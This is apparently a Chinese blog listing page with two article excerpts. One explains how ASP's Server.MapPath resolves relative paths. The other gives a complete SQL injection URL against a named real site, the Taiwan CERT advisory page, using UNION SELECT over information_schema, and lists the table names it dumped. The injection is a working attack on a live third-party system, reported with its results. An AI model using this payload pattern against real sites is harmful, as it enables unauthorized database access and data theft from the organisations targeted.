共 2 篇文章 |
|
6.爆表,爆的是twcert库http://www.cert.org.tw/document/advisory/detail.php?id=7+and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--爆出如下表downloadfile,irsys,newsdata,secrpt,secrpt_big5. 阅135 转1 评0 公众公开 16-05-06 19:04 |
当Server.MapPath方法将相对路径转为真实路径时,它实际是三部分路径加在一起得到真实路径的:网页目前执行时所在的相对路径,也就是从网站物理根目录起的相对路径,比如上面例子中conn.asp处在从根目录起的"/soft/"下;MapPath实际是通过 网页目前执行时所在的相对路径,比如上面例子中user.asp调用的数据库的相对路径是db/daidalos... 阅1 转自Ding GY 公众公开 16-05-06 18:52 |